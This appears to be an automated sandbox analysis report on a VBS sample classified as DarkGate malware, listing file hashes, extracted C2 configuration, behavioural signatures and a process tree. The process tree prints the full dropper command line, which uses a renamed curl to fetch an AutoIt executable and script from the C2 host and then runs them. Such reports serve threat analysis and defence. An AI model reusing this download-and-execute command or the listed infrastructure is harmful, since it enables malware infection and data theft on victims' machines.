Analysis

  • max time kernel
    144s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04-10-2023 16:29

General

  • Target

    Test_395-13959.vbs

  • Size

    6.9MB

  • MD5

    5a9c56d5b6a4ae5fc402d99fa45f5598

  • SHA1

    d1572724ca4ecc99edaf4104f51385265bb27682

  • SHA256

    961372719771b69d8cf4d62f2b3703d7322544d16dc08036a217102382200498

  • SHA512

    5c9ab4ba5c102217077e6b4981f99c1bbf7e0a1842bfe38edcaa5e5b59d3c7bc11a8954eb8917d05dc7addc4023fbc0758e7ed2ddcce861503ff940fcad93e57

  • SSDEEP

    49152:jzgZNELkkGo137QXFsHKCaEcFMICJ/r1lHszS6rY7fch38ZkcwMKvmLXhEbvYrTJ:t

Score
10/10

Malware Config

Extracted

Family

darkgate

Botnet

A1111

C2

http://getldrrgoodgame.com

Attributes
  • alternative_c2_port

    8080

  • anti_analysis

    true

  • anti_debug

    true

  • anti_vm

    false

  • c2_port

    2351

  • check_disk

    false

  • check_ram

    false

  • check_xeon

    false

  • crypter_au3

    true

  • crypter_dll

    false

  • crypter_rawstub

    false

  • crypto_key

    eYCqpouVyqrXSL

  • internal_mutex

    txtMut

  • minimum_disk

    100

  • minimum_ram

    4096

  • ping_interval

    4

  • rootkit

    true

  • startup_persistence

    true

  • username

    A1111

Signatures

  • DarkGate

    DarkGate is an infostealer written in C++.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Test_395-13959.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2184
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c mkdir c:\omxg & cd /d c:\omxg & copy c:\windows\system32\curl.exe omxg.exe & omxg -H "User-Agent: curl" -o Autoit3.exe http://getldrrgoodgame.com:2351 & omxg -o uujkvu.au3 http://getldrrgoodgame.com:2351/msiomxgnyqu & Autoit3.exe uujkvu.au3
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3236
      • \??\c:\omxg\omxg.exe
        omxg -H "User-Agent: curl" -o Autoit3.exe http://getldrrgoodgame.com:2351
        3⤵
        • Executes dropped EXE
        PID:4448
      • \??\c:\omxg\omxg.exe
        omxg -o uujkvu.au3 http://getldrrgoodgame.com:2351/msiomxgnyqu
        3⤵
        • Executes dropped EXE
        PID:1800
      • \??\c:\omxg\Autoit3.exe
        Autoit3.exe uujkvu.au3
        3⤵
        • Executes dropped EXE
        • Checks processor information in registry
        PID:2224

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\omxg\Autoit3.exe

    Filesize

    872KB

    MD5

    c56b5f0201a3b3de53e561fe76912bfd

    SHA1

    2a4062e10a5de813f5688221dbeb3f3ff33eb417

    SHA256

    237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

    SHA512

    195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

  • C:\omxg\omxg.exe

    Filesize

    411KB

    MD5

    1c3645ebddbe2da6a32a5f9fb43a3c23

    SHA1

    086f74a35d5afed78ae50cf5586fafffb7845464

    SHA256

    0ba1c44d0ee5b34b45b449074cda51624150dc16b3b3c38251df6c052adba205

    SHA512

    ccc9534a454971db0014ba0996d837a36cda0b91db32a93d73f17097825b1ab7c973601586d06c953bc79d2863c52c7db0fb4d04e37f83581a27e1cf7284224b

  • C:\omxg\omxg.exe

    Filesize

    411KB

    MD5

    1c3645ebddbe2da6a32a5f9fb43a3c23

    SHA1

    086f74a35d5afed78ae50cf5586fafffb7845464

    SHA256

    0ba1c44d0ee5b34b45b449074cda51624150dc16b3b3c38251df6c052adba205

    SHA512

    ccc9534a454971db0014ba0996d837a36cda0b91db32a93d73f17097825b1ab7c973601586d06c953bc79d2863c52c7db0fb4d04e37f83581a27e1cf7284224b

  • \??\c:\omxg\omxg.exe

    Filesize

    411KB

    MD5

    1c3645ebddbe2da6a32a5f9fb43a3c23

    SHA1

    086f74a35d5afed78ae50cf5586fafffb7845464

    SHA256

    0ba1c44d0ee5b34b45b449074cda51624150dc16b3b3c38251df6c052adba205

    SHA512

    ccc9534a454971db0014ba0996d837a36cda0b91db32a93d73f17097825b1ab7c973601586d06c953bc79d2863c52c7db0fb4d04e37f83581a27e1cf7284224b

  • \??\c:\omxg\uujkvu.au3

    Filesize

    901KB

    MD5

    660bc32609a1527c90990158ef449757

    SHA1

    f56b4e1477302b95173b756022248593331f81fd

    SHA256

    975d1510380171076b122cd556a1a05bd1eca33b98a9fd003fb3662cb8c83571

    SHA512

    b82e72931e51b270052e0015a55b27a0e6c18394687e2ebbffa9deb804bea2ac97bcb04b1ed3908ba539ce345ec7c57304c2544187cd78ca7f1ab4daf2e868c6

  • memory/2224-12-0x0000000001580000-0x0000000001980000-memory.dmp

    Filesize

    4.0MB

  • memory/2224-13-0x0000000004370000-0x0000000004465000-memory.dmp

    Filesize

    980KB

  • memory/2224-14-0x0000000004C40000-0x0000000005003000-memory.dmp

    Filesize

    3.8MB

  • memory/2224-16-0x0000000004C40000-0x0000000005003000-memory.dmp

    Filesize

    3.8MB

  • memory/2224-15-0x0000000004370000-0x0000000004465000-memory.dmp

    Filesize

    980KB